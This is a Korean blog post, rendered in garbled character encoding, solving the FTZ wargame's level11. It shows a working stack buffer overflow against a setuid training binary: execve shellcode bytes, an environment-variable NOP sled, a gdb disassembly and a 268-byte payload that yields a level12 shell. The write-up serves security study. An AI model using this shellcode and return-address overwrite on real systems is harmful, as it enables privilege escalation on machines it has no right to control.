Kang MyoungSeok

Kang MyoungSeok

Blog for Studying
Computer Science Engineering
and Cyber Security

[FTZ] level11 ํ’€์ด

1 ๋ถ„ ์†Œ์š”

๐Ÿ’ก FTZ level11 ํ’€์ด

๋ฌธ์ œ

๊ณ„์ • : level11/what!@#$?

hint

#include <stdio.h>
#include <stdlib.h>

int main( int argc, char *argv[] )
{
        char str[256];

        setreuid( 3092, 3092 );
        strcpy( str, argv[1] );
        printf( str );
}

ํ’€์ด

bof ์ทจ์•ฝ์ ์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ์‰˜ ์ฝ”๋“œ๋ฅผ ์ž‘์„ฑํ•˜์—ฌ ์‰˜ ์ฝ”๋“œ ์ฃผ์†Œ๋กœ ret ์ฃผ์†Œ๋ฅผ ๋ฎ์–ด ์จ์„œ ๊ถŒํ•œ์„ ํƒˆ์ทจํ•ฉ๋‹ˆ๋‹ค.

์‰˜ ์ฝ”๋“œ๋Š” ๊ตฌ๊ธ€๋ง ํ•ด์„œ ์ฐพ์•˜์Šต๋‹ˆ๋‹ค.

\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80

ํ™˜๊ฒฝ๋ณ€์ˆ˜

์‰˜ ์ฝ”๋“œ๋ฅผ ํ™˜๊ฒฝ๋ณ€์ˆ˜์— ๋“ฑ๋กํ•˜์—ฌ ๋ฆฌํ„ด ์ฃผ์†Œ๋ฅผ ํ™˜๊ฒฝ๋ณ€์ˆ˜๋กœ ๋ฐ”๊พธ๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค.

1) ํ™˜๊ฒฝ๋ณ€์ˆ˜์— shell ์ฝ”๋“œ ๋“ฑ๋กํ•˜๊ธฐ

[level11@ftz level11]$ export sh=$(python -c 'print("\x90"*10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')

image

2) ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ๋ฉ”๋ชจ๋ฆฌ ์ฃผ์†Œ ์•Œ์•„๋‚ด๊ธฐ

ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ๋ฉ”๋ชจ๋ฆฌ ์ฃผ์†Œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์ฝ”๋“œ๋ฅผ ์ž‘์„ฑํ•˜์—ฌ ์•Œ์•„๋ƒ…๋‹ˆ๋‹ค.

env.c

#include <stdio.h>

int main(int argc, char* argv[]){
    char *addr;
    addr = (char*)getenv(argv[1]);
    printf("located at %p\n",addr);
    return 0;
}

[level11@ftz tmp]$ gcc -o env env.c
[level11@ftz tmp]$ ./env sh
located at 0xbfffff2f

3) bof ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ret ์ฃผ์†Œ ๋ณ€๊ฒฝ

[level11@ftz level11]$ gdb -q attackme
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x08048470 <main+0>:    push   ebp
0x08048471 <main+1>:    mov    ebp,esp
0x08048473 <main+3>:    sub    esp,0x108
0x08048479 <main+9>:    sub    esp,0x8
0x0804847c <main+12>:   push   0xc14
0x08048481 <main+17>:   push   0xc14
0x08048486 <main+22>:   call   0x804834c <setreuid>
0x0804848b <main+27>:   add    esp,0x10
0x0804848e <main+30>:   sub    esp,0x8
0x08048491 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048494 <main+36>:   add    eax,0x4
0x08048497 <main+39>:   push   DWORD PTR [eax]
0x08048499 <main+41>:   lea    eax,[ebp-264]
0x0804849f <main+47>:   push   eax
0x080484a0 <main+48>:   call   0x804835c <strcpy>
0x080484a5 <main+53>:   add    esp,0x10
0x080484a8 <main+56>:   sub    esp,0xc
0x080484ab <main+59>:   lea    eax,[ebp-264]
0x080484b1 <main+65>:   push   eax
0x080484b2 <main+66>:   call   0x804833c <printf>
0x080484b7 <main+71>:   add    esp,0x10
0x080484ba <main+74>:   leave
0x080484bb <main+75>:   ret
0x080484bc <main+76>:   nop
0x080484bd <main+77>:   nop
0x080484be <main+78>:   nop
0x080484bf <main+79>:   nop
End of assembler dump.
(gdb)

์Šคํƒ์˜ ๊ตฌ์กฐ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค.

str 256 byte
dummy 8 byte
ebp 4 byte
ret 4 byte

๋”ฐ๋ผ์„œ 268 ๋ฐ”์ดํŠธ์˜ ๋”๋ฏธ๋ฅผ ๋„ฃ์–ด์ฃผ๊ณ , ํ™˜๊ฒฝ๋ณ€์ˆ˜์˜ ์ฃผ์†Œ๋ฅผ ๋„ฃ์–ด์ฃผ๋ฉด ๋ฉ๋‹ˆ๋‹ค.

[level11@ftz level11]$ ./attackme $(python -c 'print("A"*268+"\x2f\xff\xff\xbf")')
sh-2.05b$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05b$

ํƒœ๊ทธ:

์นดํ…Œ๊ณ ๋ฆฌ:

์—…๋ฐ์ดํŠธ:

๋Œ“๊ธ€๋‚จ๊ธฐ๊ธฐ

์ฐธ๊ณ